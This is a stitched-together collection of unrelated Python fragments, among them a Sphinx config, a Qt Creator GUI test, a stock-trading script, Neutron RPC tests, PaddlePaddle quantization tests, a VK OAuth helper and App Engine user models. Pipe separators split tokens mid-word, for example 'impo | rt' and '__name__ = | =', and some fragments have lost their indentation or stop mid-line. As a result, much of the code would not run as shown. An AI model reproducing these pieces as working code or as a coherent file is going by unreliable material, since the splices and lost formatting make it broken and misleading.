        """Return the console's drawing canvas element (noVNC or SPICE)."""
        return self._find_console_element(self._canvas_element)
    def get_console_ctrl_alt_del_btn(self):
        """Return the console's Ctrl+Alt+Del button element."""
        return self._find_console_element(self._ctrl_alt_del_xpath)
    def get_console_fullscreen_btn(self):
        """Return the console's fullscreen toggle button element."""
        return self._find_console_element(self._fullscreen_xpath)
|
#!/usr/bin/env python3
from distutils.core import setup
from catkin_pkg.python_setup impo | rt generate_distutils_setup
# Build the distutils arguments from the catkin package.xml metadata.
d = generate_distutils_setup(
    packages=['lg_keyboard'],
    package_dir={'': 'src'},
    scripts=[],
    requires=[]
)
setup(**d)
# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4
| |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# clamm documentation build configuration file, created by
# sphinx-quickstart on Thu Mar 2 20:47:20 2017.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
# Make the clamm package importable so sphinx.ext.autodoc can find it.
sys.path.insert(0, os.path.abspath('../clamm'))
# -- General configuration ------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.coverage',
    'sphinx.ext.napoleon']
# Parse NumPy-style docstrings with napoleon.
napoleon_numpy_docstring = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = 'clamm'
copyright = '2017, Paul Adams'
author = 'Paul Adams'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.1'
# The full version, including alpha/beta/rc tags.
release = '0.1'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This patterns also effect to html_static_path and html_extra_path
exclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# -- Options for HTMLHelp output ------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'clammdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
    # The paper size ('letterpaper' or 'a4paper').
    #
    # 'papersize': 'letterpaper',
    # The font size ('10pt', '11pt' or '12pt').
    #
    # 'pointsize': '10pt',
    # Additional stuff for the LaTeX preamble.
    #
    # 'preamble': '',
    # Latex figure (float) alignment
    #
    # 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
#  author, documentclass [howto, manual, or own class]).
latex_documents = [
    (master_doc, 'clamm.tex', 'clamm Documentation',
     'Paul Adams', 'manual'),
]
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
    (master_doc, 'clamm', 'clamm Documentation',
     [author], 1)
]
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
#  dir menu entry, description, category)
texinfo_documents = [
    (master_doc, 'clamm', 'clamm Documentation',
     author, 'clamm', 'One line description of project.',
     'Miscellaneous'),
]
|
#############################################################################
##
## Copyright (C) 2015 The Qt Company Ltd.
## Contact: http://www.qt.io/licensing
##
## This file is part of Qt Creator.
##
## Commercial License Usage
## Licensees holding valid commercial Qt licenses may use this file in
## accordance with the commercial license agreement provided with the
## Software or, alternatively, in accordance with the terms contained in
## a written agreement between you and The Qt Company. For licensing terms and
## conditions see http://www.qt.io/terms-conditions. For further information
## use the contact form at http://www.qt.io/contact-us.
##
## GNU Lesser General Public License Usage
## Alternatively, this file may be used under the terms of the GNU Lesser
## General Public License version 2.1 or version 3 as published by the Free
## Software Foundation and appearing in the file LICENSE.LGPLv21 and
## LICENSE.LGPLv3 included in the packaging of this file. Please review the
## following information to ensure the GNU Lesser General Public License
## requirements will be met: https://www.gnu.org/licenses/lgpl.html and
## http://www.gnu.org/licenses/old-licenses/lgpl-2.1.html.
##
## In addition, as a special exception, The Qt Company gives you certain additional
## rights. These rights are described in The Qt Company LGPL Exception
## version 1.1, included in the file LGPL_EXCEPTION.txt in this package.
##
#############################################################################
# Pull in the shared Squish helpers (startApplication, Targets, test, ...).
source("../../shared/qtcreator.py")
import re
# Path to the SpeedCrunch .pro file; filled in by init().
SpeedCrunchPath = ""
def buildConfigFromFancyToolButton(fancyToolButton):
    """Extract the active build configuration name from the fancy tool
    button's HTML tooltip (the text between the 'Build:' and 'Deploy:'
    markers)."""
    BUILD_MARKER = "<b>Build:</b> "
    DEPLOY_MARKER = "<br/><b>Deploy:</b>"
    tooltip = str(fancyToolButton.toolTip)
    start = tooltip.find(BUILD_MARKER) + len(BUILD_MARKER)
    return tooltip[start:tooltip.find(DEPLOY_MARKER)]
def main():
    """Open the SpeedCrunch qmake project in Qt Creator and rebuild it in
    every available Release configuration, checking for compile errors."""
    if not neededFilePresent(SpeedCrunchPath):
        return
    startApplication("qtcreator" + SettingsPath)
    if not startedWithoutPluginError():
        return
    suitableKits = Targets.DESKTOP_480_GCC
    if platform.system() in ('Windows', 'Microsoft'):
        suitableKits |= Targets.DESKTOP_480_MSVC2010
    checkedTargets = openQmakeProject(SpeedCrunchPath, suitableKits)
    progressBarWait(30000)
    fancyToolButton = waitForObject(":*Qt Creator_Core::Internal::FancyToolButton")
    availableConfigs = iterateBuildConfigs(len(checkedTargets), "Release")
    if not availableConfigs:
        # No Release config: the loop below simply won't run.
        test.fatal("Haven't found a suitable Qt version (need Release build) - leaving without building.")
    for kit, config in availableConfigs:
        selectBuildConfig(len(checkedTargets), kit, config)
        # Sanity check: the UI must actually have switched to the config.
        buildConfig = buildConfigFromFancyToolButton(fancyToolButton)
        if buildConfig != config:
            test.fatal("Build configuration %s is selected instead of %s" % (buildConfig, config))
            continue
        test.log("Testing build configuration: " + config)
        if not JIRA.isBugStillOpen(13700):
            invokeMenuItem("Build", "Run qmake")
            waitForCompile()
        invokeMenuItem("Build", "Rebuild All")
        waitForCompile(300000)
        checkCompile()
        checkLastBuild()
    # Add a new run configuration
    invokeMenuItem("File", "Exit")
def init():
    """Squish hook run before main(): locate the test project and start clean."""
    global SpeedCrunchPath
    SpeedCrunchPath = os.path.join(srcPath, "creator-test-data", "speedcrunch", "src", "speedcrunch.pro")
    cleanup()
def cleanup():
    """Remove per-user project files and stale shadow-build directories.

    Fix: the loop variable was named ``dir``, shadowing the builtin; it is
    now ``build_dir``.
    """
    # Make sure the .user files are gone
    cleanUpUserFiles(SpeedCrunchPath)
    # Drop shadow-build directories left over from earlier runs.
    for build_dir in glob.glob(os.path.join(srcPath, "creator-test-data", "speedcrunch", "speedcrunch-build-*")):
        deleteDirIfExists(build_dir)
|
import shipane_sdk
# Initialization function: set up the security to trade, the benchmark, etc.
def initialize(context):
    """Set the traded security and the performance benchmark."""
    # Define a global variable holding the security to operate on:
    # 000001 (stock: Ping An Bank)
    g.security = '000001.XSHE'
    # Use the CSI 300 index as the benchmark
    set_benchmark('000300.XSHG')
def process_initialize(context):
    """Create the ShiPanE strategy manager; runs on every process start."""
    # Create the StrategyManager object.
    # The argument is the manager id from the configuration file.
    g.__manager = shipane_sdk.JoinQuantStrategyManagerFactory(context).create('manager-1')
# Called once per unit of time (once per day when backtesting daily, once per minute when backtesting by minute)
def handle_data(context, data):
    """Place, mirror and cancel orders through the ShiPanE manager."""
    # Keep the order object returned by JoinQuant
    order_ = order(g.security, 100)
    # ShiPanE places the real-world trade based on JoinQuant's order object
    g.__manager.execute(order_)
    order_ = order(g.security, -100)
    g.__manager.execute(order_)
    # Cancel the order
    g.__manager.cancel(order_)
|
pplicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import mock
from oslo_versionedobjects import base as obj_base
from oslo_versionedobjects import fields as obj_fields
import testtools
from neutron.api.rpc.callbacks import resources
from neutron.api.rpc.handlers import resources_rpc
from neutron.common import topics
from neutron import context
from neutron.objects import base as objects_base
from neutron.tests import base
def _create_test_dict():
return {'id': 'uuid',
'field': 'foo'}
def _create_test_resource(context=None):
    """Build a FakeResource from the canonical test dict, with its change
    tracking reset so it looks freshly loaded."""
    resource = FakeResource(context, **_create_test_dict())
    resource.obj_reset_changes()
    return resource
@obj_base.VersionedObjectRegistry.register
class FakeResource(objects_base.NeutronObject):
    """Minimal versioned object used as the RPC payload in these tests."""
    fields = {
        'id': obj_fields.UUIDField(),
        'field': obj_fields.StringField()
    }
    @classmethod
    def get_objects(cls, context, **kwargs):
        # No backing store in tests; always report zero matching objects.
        return list()
class ResourcesRpcBaseTestCase(base.BaseTestCase):
    """Common fixture: provides an admin request context for the RPC tests."""
    def setUp(self):
        super(ResourcesRpcBaseTestCase, self).setUp()
        self.context = context.get_admin_context()
class _ValidateResourceTypeTestCase(base.BaseTestCase):
    """Tests for the private _validate_resource_type() helper."""
    def setUp(self):
        super(_ValidateResourceTypeTestCase, self).setUp()
        # Stub the registry lookup so validity can be toggled per test.
        self.is_valid_mock = mock.patch.object(
            resources_rpc.resources, 'is_valid_resource_type').start()
    def test_valid_type(self):
        # A valid type must pass silently (no exception raised).
        self.is_valid_mock.return_value = True
        resources_rpc._validate_resource_type('foo')
    def test_invalid_type(self):
        # An unknown type must raise InvalidResourceTypeClass.
        self.is_valid_mock.return_value = False
        with testtools.ExpectedException(
                resources_rpc.InvalidResourceTypeClass):
            resources_rpc._validate_resource_type('foo')
class _ResourceTypeVersionedTopicTestCase(base.BaseTestCase):
    """Tests for resource_type_versioned_topic()."""
    @mock.patch.object(resources_rpc, '_validate_resource_type')
    def test_resource_type_versioned_topic(self, validate_mock):
        # The topic string must embed the class name and its version.
        obj_name = FakeResource.obj_name()
        expected = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': 'FakeResource', 'version': '1.0'}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = resources_rpc.resource_type_versioned_topic(obj_name)
        self.assertEqual(expected, observed)
class ResourcesPullRpcApiTestCase(ResourcesRpcBaseTestCase):
    """Tests for the client side (ResourcesPullRpcApi) of the pull RPC."""
    def setUp(self):
        super(ResourcesPullRpcApiTestCase, self).setUp()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        mock.patch('neutron.api.rpc.callbacks.resources.get_resource_cls',
                   return_value=FakeResource).start()
        self.rpc = resources_rpc.ResourcesPullRpcApi()
        # Replace the messaging client; tests inspect the prepared context.
        mock.patch.object(self.rpc, 'client').start()
        self.cctxt_mock = self.rpc.client.prepare.return_value
    def test_is_singleton(self):
        # The API class caches a single instance per process.
        self.assertIs(self.rpc, resources_rpc.ResourcesPullRpcApi())
    def test_pull(self):
        expected_obj = _create_test_resource(self.context)
        resource_id = expected_obj.id
        # The transport returns a primitive; pull() must rebuild the object.
        self.cctxt_mock.call.return_value = expected_obj.obj_to_primitive()
        result = self.rpc.pull(
            self.context, FakeResource.obj_name(), resource_id)
        self.cctxt_mock.call.assert_called_once_with(
            self.context, 'pull', resource_type='FakeResource',
            version=FakeResource.VERSION, resource_id=resource_id)
        self.assertEqual(expected_obj, result)
    def test_pull_resource_not_found(self):
        resource_dict = _create_test_dict()
        resource_id = resource_dict['id']
        # A None payload from the server maps to ResourceNotFound.
        self.cctxt_mock.call.return_value = None
        with testtools.ExpectedException(resources_rpc.ResourceNotFound):
            self.rpc.pull(self.context, FakeResource.obj_name(),
                          resource_id)
class ResourcesPullRpcCallbackTestCase(ResourcesRpcBaseTestCase):
    """Tests for the server-side ResourcesPullRpcCallback endpoint."""

    def setUp(self):
        super(ResourcesPullRpcCallbackTestCase, self).setUp()
        self.callbacks = resources_rpc.ResourcesPullRpcCallback()
        self.resource_obj = _create_test_resource(self.context)

    def test_pull(self):
        resource_dict = _create_test_dict()
        # The callback must look the object up in the producer registry and
        # return it serialized as a versioned-object primitive.
        with mock.patch.object(
                resources_rpc.prod_registry, 'pull',
                return_value=self.resource_obj) as registry_mock:
            primitive = self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
        registry_mock.assert_called_once_with(
            'FakeResource', self.resource_obj.id, context=self.context)
        self.assertEqual(resource_dict,
                         primitive['versioned_object.data'])
        self.assertEqual(self.resource_obj.obj_to_primitive(), primitive)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_no_backport_for_latest_version(self, to_prim_mock):
        # When the caller already speaks the current version, no backport
        # target is requested (target_version=None).
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version=FakeResource.VERSION,
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version=None)

    @mock.patch.object(FakeResource, 'obj_to_primitive')
    def test_pull_backports_to_older_version(self, to_prim_mock):
        # An older caller version must be passed through as the backport
        # target for serialization.
        with mock.patch.object(resources_rpc.prod_registry, 'pull',
                               return_value=self.resource_obj):
            self.callbacks.pull(
                self.context, resource_type=FakeResource.obj_name(),
                version='0.9',  # less than initial version 1.0
                resource_id=self.resource_obj.id)
            to_prim_mock.assert_called_with(target_version='0.9')
class ResourcesPushRpcApiTestCase(ResourcesRpcBaseTestCase):
    """Tests for the fanout ResourcesPushRpcApi client."""

    def setUp(self):
        super(ResourcesPushRpcApiTestCase, self).setUp()
        # Stub out the transport and type validation entirely.
        mock.patch.object(resources_rpc.n_rpc, 'get_client').start()
        mock.patch.object(resources_rpc, '_validate_resource_type').start()
        self.rpc = resources_rpc.ResourcesPushRpcApi()
        self.cctxt_mock = self.rpc.client.prepare.return_value
        self.resource_obj = _create_test_resource(self.context)

    def test__prepare_object_fanout_context(self):
        # The fanout context must be prepared on the versioned topic that
        # matches the pushed object's type and version.
        expected_topic = topics.RESOURCE_TOPIC_PATTERN % {
            'resource_type': resources.get_resource_type(self.resource_obj),
            'version': self.resource_obj.VERSION}
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            observed = self.rpc._prepare_object_fanout_context(
                self.resource_obj)
        self.rpc.client.prepare.assert_called_once_with(
            fanout=True, topic=expected_topic)
        self.assertEqual(self.cctxt_mock, observed)

    def test_pushy(self):
        # push() must cast the serialized object plus the event type.
        with mock.patch.object(resources_rpc.resources, 'get_resource_cls',
                               return_value=FakeResource):
            self.rpc.push(
                self.context, self.resource_obj, 'TYPE')
        self.cctxt_mock.cast.assert_called_once_with(
            self.context, 'push',
            resource=self.resource_obj.obj_to_primitive(),
            event_type='TYPE')
class ResourcesPushRpcCallbackTestCase(ResourcesRpcBaseTestCase):
def setUp(self):
super(ResourcesPushRpcCallbackTestCase, self).setUp()
mock.patch.object(resources_rpc, '_validate_resource_type').start()
mock.patch.object(
resources_rpc.resources,
'get_resource_cls', return_value=FakeResource).start()
self.resource_obj = _create_test_resource(self.context)
self.resource_prim = self.resource_obj.obj_to_primitiv |
#!/usr/bin/env python
# Paths to the real-valued feature files shipped with the shogun examples.
traindat = '../data/fm_train_real.dat'
testdat = '../data/fm_test_real.dat'
# Each entry: [train file, test file, ANOVA cardinality d, kernel cache size].
parameter_list = [[traindat,testdat,2,10], [traindat,testdat,5,10]]
def kernel_anova_modular (train_fname=traindat,test_fname=testdat,cardinality=2, size_cache=10):
    """Compute ANOVA kernel matrices for the train/train and train/test pairs.

    Returns (km_train, km_test, kernel).
    """
    from modshogun import ANOVAKernel,RealFeatures,CSVFile

    train_feats = RealFeatures(CSVFile(train_fname))
    test_feats = RealFeatures(CSVFile(test_fname))

    # Kernel is first built on the training data with itself.
    anova = ANOVAKernel(train_feats, train_feats, cardinality, size_cache)
    km_train = anova.get_kernel_matrix()

    # Re-initialize against the test features for the cross kernel matrix.
    anova.init(train_feats, test_feats)
    km_test = anova.get_kernel_matrix()

    return km_train, km_test, anova
# Run the first parameter set as a smoke test when executed directly.
if __name__=='__main__':
    print('ANOVA')
    kernel_anova_modular(*parameter_list[0])
|
from math import sqrt
def main():
n = int(input("Enter n : "))
boolArr = [True for i in range(n + 1)]
boolArr[0] = boolArr[1] = False
for i in range(2, int(sqrt(n) + 1)):
if boolArr[i] is True:
for j in range(i * i, n + 1, i):
# print(boolArr)
boo | lArr[j] = False
for i in range(2, n + 1):
if boolArr[i] is True:
print(i)
if __name__ = | = '__main__':
main()
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function
import unittest
import numpy as np
from op_test import OpTest
import paddle.fluid.core as core
class TestFakeQuantizeOp(OpTest):
    """Checks fake_quantize_abs_max against a NumPy reference."""

    def setUp(self):
        self.op_type = "fake_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        x = np.random.random((124, 240)).astype("float32")
        self.inputs = {'X': x, }
        # Reference: symmetric abs-max quantization to bit_length bits.
        scale = np.max(np.abs(x)).astype("float32")
        qmax = (1 << (self.attrs['bit_length'] - 1)) - 1
        self.outputs = {
            'Out': np.round(x / scale * qmax),
            'OutScale': np.array(scale).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()
class TestFakeChannelWiseQuantizeOp(OpTest):
    """Checks fake_channel_wise_quantize_abs_max with a per-channel reference."""

    def setUp(self):
        self.op_type = "fake_channel_wise_quantize_abs_max"
        self.attrs = {'bit_length': 8}
        x = np.random.random((4, 3, 64, 64)).astype("float32")
        self.inputs = {
            'X': x,
        }
        # One abs-max scale per output channel (axis 0).
        scales = [np.max(np.abs(x[c])).astype("float32")
                  for c in range(x.shape[0])]
        qmax = (1 << (self.attrs['bit_length'] - 1)) - 1
        expected = x.copy()
        for channel, scale in enumerate(scales):
            expected[channel] = np.round(expected[channel] / scale * qmax)
        self.outputs = {
            'Out': expected,
            'OutScale': np.array(scales).astype("float32"),
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeRangeAbsMaxOp(OpTest):
    """Checks fake_quantize_range_abs_max in training mode (is_test=False)."""

    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'window_size': int(1),
            'is_test': False
        }
        # Signed inputs in roughly [-5, 5).
        x = ((np.random.random((8, 16, 7, 7)) - 0.5) * 10).astype("float32")
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': np.zeros(1).astype("float32")
        }
        scale = np.max(np.abs(x)).astype("float32")
        # First slot of the scale window holds the current abs-max.
        window = np.zeros(self.attrs['window_size']).astype("float32")
        window[0] = scale
        qmax = (1 << (self.attrs['bit_length'] - 1)) - 1
        self.outputs = {
            'Out': np.round(x / scale * qmax),
            'OutScale': scale,
            'OutScales': window,
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeMovingOp(OpTest):
    """Checks fake_quantize_moving_average_abs_max with a NumPy reference."""

    def setUp(self):
        self.op_type = "fake_quantize_moving_average_abs_max"
        self.attrs = {
            'bit_length': int(5),
            'moving_rate': float(0.9),
            'is_test': False
        }
        accum = np.ones(1).astype("float32")
        state = np.ones(1).astype("float32")
        scale = np.zeros(1).astype("float32")
        scale[0] = 0.001
        x = np.random.random((8, 16, 7, 7)).astype("float32")
        self.inputs = {
            'X': x,
            'InScale': scale,
            'InAccum': accum,
            'InState': state,
        }
        # Moving-average update: accum' = r*accum + max|X|, state' = r*state + 1,
        # scale' = accum' / state'.
        rate = self.attrs['moving_rate']
        out_accum = np.zeros(1).astype("float32")
        out_state = np.zeros(1).astype("float32")
        out_accum[0] = rate * accum[0] + np.max(np.abs(x)).astype("float32")
        out_state[0] = rate * state[0] + 1
        out_scale = out_accum / out_state
        qmax = (1 << (self.attrs['bit_length'] - 1)) - 1
        self.outputs = {
            'Out': np.round(x / out_scale * qmax),
            'OutAccum': out_accum,
            'OutState': out_state,
            'OutScale': out_scale,
        }

    def test_check_output(self):
        self.check_output()
class TestFakeQuantizeRangeAbsMaxOp2(OpTest):
    """Checks fake_quantize_range_abs_max in inference mode (is_test=True)."""

    def setUp(self):
        self.op_type = "fake_quantize_range_abs_max"
        self.attrs = {
            'bit_length': int(8),
            'window_size': int(1),
            'is_test': True
        }
        x = ((np.random.random((8, 16, 7, 7)) - 0.5) * 10).astype("float32")
        # Deliberately smaller than the true abs-max so clipping kicks in.
        scale = np.max(np.abs(x)).astype("float32") - 1.0
        window = np.zeros(self.attrs['window_size']).astype("float32")
        window[0] = scale
        self.inputs = {
            'X': x,
            'Iter': np.zeros(1).astype("int64"),
            'InScale': scale.astype("float32")
        }
        clipped = np.clip(x, -scale, scale)
        qmax = (1 << (self.attrs['bit_length'] - 1)) - 1
        self.outputs = {
            'Out': np.round(clipped / scale * qmax),
            'OutScale': scale.astype("float32"),
            'OutScales': window,
        }

    def test_check_output(self):
        # In inference mode the scales are not recomputed; skip checking them.
        self.check_output(no_check_set=set(['OutScale', 'OutScales']))
# Allow running this test module directly with the unittest runner.
if __name__ == "__main__":
    unittest.main()
|
# vkapi.py
#
# Copyright 2016 Igor Unixoid Kolonchenko <enepunixoid@gmail.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the impl | ied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this pr | ogram; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston,
# MA 02110-1301, USA.
#
#
import requests
import sys
class vkapi(object):
    """Minimal VK OAuth (implicit flow) helper.

    Example authorize URL:
        https://oauth.vk.com/authorize?
        client_id=1&display=page&redirect_uri=http://example.com/callback
        &scope=friends&response_type=token&v=5.57&state=123456
    """

    def __init__(self, _ci, _ru, _scope):
        """Store client id, redirect URL and requested permission scope."""
        self.client_id = _ci
        # Bug fix: original used '==' (comparison) instead of '=' (assignment).
        self.redirect_url = _ru
        # Requested access-rights bitmask.
        self.scope = _scope
        # Filled in after a successful authorization.
        self.access_token = ''

    def auth(self, login, passwd):
        """Request the OAuth authorization page; return the HTTP response.

        Returns None when the HTTP request fails.
        NOTE(review): login/passwd are accepted but not yet used — the
        original code was truncated before any credential handling; keep
        the parameters for interface compatibility.
        """
        url = "https://oauth.vk.com/authorize"
        # Bug fix: 'params' was used without ever being defined; the key
        # was also misspelled 'redirecct_url' — VK expects 'redirect_uri'.
        params = {
            "client_id": self.client_id,
            "display": "mobile",
            "redirect_uri": self.redirect_url,
            "scope": self.scope,
            "response_type": "token",
        }
        try:
            return requests.get(url, params=params)
        except requests.RequestException:
            # Original ended in a truncated bare 'except requests.' —
            # catch the library's base exception and signal failure.
            return None
|
from webapp2_extras.appengine.auth.models import User
from google.appengine.ext import ndb
class User(User):
    """
    Universal user model. Can be used with App Engine's default users API,
    own auth or third party authentication methods (OpenID, OAuth etc).
    based on https://gist.github.com/kylefinley
    """
    #: Creation date.
    created = ndb.DateTimeProperty(auto_now_add=True)
    #: Modification date.
    updated = ndb.DateTimeProperty(auto_now=True)
    #: User defined unique name, also used as key_name.
    # Not used by OpenID
    username = ndb.StringProperty()
    #: User Name
    name = ndb.StringProperty()
    #: User Last Name
    last_name = ndb.StringProperty()
    #: User email
    email = ndb.StringProperty()
    #: Hashed password. Only set for own authentication.
    # Not required because third party authentication
    # doesn't use password.
    password = ndb.StringProperty()
    #: User Country
    country = ndb.StringProperty()
    #: User TimeZone
    tz = ndb.StringProperty()
    #: Account activation verifies email
    activated = ndb.BooleanProperty(default=False)

    @classmethod
    def get_by_email(cls, email):
        """Returns a user object based on an email.

        :param email:
            String representing the user email.
        :returns:
            A user object, or None if no user has that email.
        """
        return cls.query(cls.email == email).get()

    @classmethod
    def create_resend_token(cls, user_id):
        """Create and return a token for re-sending the activation mail."""
        entity = cls.token_model.create(user_id, 'resend-activation-mail')
        return entity.token

    @classmethod
    def validate_resend_token(cls, user_id, token):
        """Return whether ``token`` is a valid resend-activation token."""
        return cls.validate_token(user_id, 'resend-activation-mail', token)

    @classmethod
    def delete_resend_token(cls, user_id, token):
        """Invalidate a resend-activation token (e.g. after use)."""
        cls.token_model.get_key(user_id, 'resend-activation-mail', token).delete()

    def get_social_providers_names(self):
        """Return provider names of all social accounts linked to this user."""
        social_user_objects = SocialUser.get_by_user(self.key)
        result = []
        # import logging
        for social_user_object in social_user_objects:
            # logging.error(social_user_object.extra_data['screen_name'])
            result.append(social_user_object.provider)
        return result

    def get_social_providers_info(self):
        """Split PROVIDERS_INFO into providers this user has linked
        ('used') and the rest ('unused')."""
        providers = self.get_social_providers_names()
        result = {'used': [], 'unused': []}
        for k,v in SocialUser.PROVIDERS_INFO.items():
            if k in providers:
                result['used'].append(v)
            else:
                result['unused'].append(v)
        return result
class LogVisit(ndb.Model):
    """One recorded page visit, optionally tied to a user."""

    #: Visiting user; may be unset for anonymous visits.
    user = ndb.KeyProperty(kind=User)
    #: Raw User-Agent header of the request.
    uastring = ndb.StringProperty()
    #: Client IP address.
    ip = ndb.StringProperty()
    #: Visit time. NOTE(review): stored as a string rather than a
    #: DateTimeProperty — presumably pre-formatted by the caller; confirm
    #: before changing the type.
    timestamp = ndb.StringProperty()
class LogEmail(ndb.Model):
    """Audit record of an outgoing email."""

    #: Sender address.
    sender = ndb.StringProperty(
        required=True)
    #: Recipient address.
    to = ndb.StringProperty(
        required=True)
    #: Subject line.
    subject = ndb.StringProperty(
        required=True)
    #: Message body (unindexed text).
    body = ndb.TextProperty()
    #: When the email was sent.
    when = ndb.DateTimeProperty()
class SocialUser(ndb.Model):
    """Links a User to a third-party authentication provider account.

    Both the (provider, uid) pair and the (user, provider) pair are kept
    unique via the check_unique* helpers.
    """

    PROVIDERS_INFO = { # uri is for OpenID only (not OAuth)
        'google': {'name': 'google', 'label': 'Google', 'uri': 'gmail.com'},
        #'github': {'name': 'github', 'label': 'Github', 'uri': ''},
        #'facebook': {'name': 'facebook', 'label': 'Facebook', 'uri': ''},
        #'linkedin': {'name': 'linkedin', 'label': 'LinkedIn', 'uri': ''},
        #'myopenid': {'name': 'myopenid', 'label': 'MyOpenid', 'uri': 'myopenid.com'},
        #'twitter': {'name': 'twitter', 'label': 'Twitter', 'uri': ''},
        #'yahoo': {'name': 'yahoo', 'label': 'Yahoo!', 'uri': 'yahoo.com'},
    }

    #: Owning user.
    user = ndb.KeyProperty(kind=User)
    #: Provider key, e.g. 'google'.
    provider = ndb.StringProperty()
    #: Provider-side user id.
    uid = ndb.StringProperty()
    #: Raw profile data returned by the provider.
    extra_data = ndb.JsonProperty()

    @classmethod
    def get_by_user(cls, user):
        """Return all social accounts linked to ``user`` (an ndb key)."""
        return cls.query(cls.user == user).fetch()

    @classmethod
    def get_by_user_and_provider(cls, user, provider):
        """Return the link for (user, provider), or None."""
        return cls.query(cls.user == user, cls.provider == provider).get()

    @classmethod
    def get_by_provider_and_uid(cls, provider, uid):
        """Return the link for (provider, uid), or None."""
        return cls.query(cls.provider == provider, cls.uid == uid).get()

    @classmethod
    def check_unique_uid(cls, provider, uid):
        """True if no account with this (provider, uid) pair exists yet."""
        # Idiom fix: return the comparison directly instead of an
        # if/else that returns True/False.
        return cls.get_by_provider_and_uid(provider, uid) is None

    @classmethod
    def check_unique_user(cls, provider, user):
        """True if ``user`` has not linked this provider yet."""
        return cls.get_by_user_and_provider(user, provider) is None

    @classmethod
    def check_unique(cls, user, provider, uid):
        """True if both uniqueness constraints hold for this link."""
        return (cls.check_unique_uid(provider, uid) and
                cls.check_unique_user(provider, user))

    @staticmethod
    def open_id_providers():
        """Names of providers that support OpenID (have a non-empty uri)."""
        return [k for k, v in SocialUser.PROVIDERS_INFO.items() if v['uri']]
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Addons modules by CLEARCORP S.A.
# Copyright (C) 2009-TODAY CLE | ARCORP S.A. (<http://clearcorp.co.cr>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
